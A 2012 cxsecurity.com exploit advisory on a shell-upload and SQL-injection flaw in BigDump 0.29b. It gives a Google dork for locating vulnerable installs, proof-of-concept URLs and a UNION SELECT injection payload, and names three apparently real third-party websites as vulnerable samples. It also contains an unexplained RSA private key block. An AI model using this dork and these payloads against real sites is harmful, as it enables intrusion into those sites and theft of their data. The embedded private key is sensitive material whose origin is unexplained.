BigDump 0.29b Shell Upload & SQL Injection

2012.11.30
Credit: Ur0b0r0x
Risk: High
Local: No
Remote: Yes
CVE: N/A

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_@live.com # Line: GreyHat # Home: cyberpunk-ur0x.blogspot.com # Exploit Title: BigDump ver.0.29b - Arbitrary Upload / Sql Injection Vulnerabilities # Dork: intitle:"BigDump ver.0.29b" # Date: 28/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.ozerov.de/bigdump/ # Vendor Name: BigDump # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [25/11/2012] - Vulnerability discovered [27/11/2012] - Vendor notified Dont responsed [28/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/bigdump.php?start= < Sql Vulnerability Path > http://site.com/bigdump.php < Arbitrary Upload Paht > # Expl0it/P0c/upload ############### Input $ch = curl_init("http://site.com/bigdump.php?start=shell.php") Output $ch = curl_init("http://site.com/bigdump/uploads/shell.php") # Expl0it/P0c/Sql ################### +union+select+1,2,3,4,5,6,7,8,9,10--+ # Vulnerability/C0de/################### <form method="POST" action="<?php echo ($_SERVER["PHP_SELF"]); ?>?action=step3" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="$upload_max_filesize"> <p>Dump file: <input type="file" name="dumpfile" accept="*/*" size=60"></p> <p><input type="submit" name="uploadbutton" value="Upload"></p></form> # Samples/Arbitrart_Upload/Sql #################### http://www.ebaglung.com/bigdump/bigdump.php http://khobraa.com/bigdump.php http://www.australiabusinessdirectory.info/bigdump.php http://www.ebaglung.com/bigdump/bigdump.php?start=% http://khobraa.com/bigdump.php?start=% http://www.australiabusinessdirectory.info/bigdump.php?start=% -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi 2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8 GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/ WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R 8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM 8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/ -----END RSA PRIVATE KEY-----

References:

http://www.ozerov.de/bigdump/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top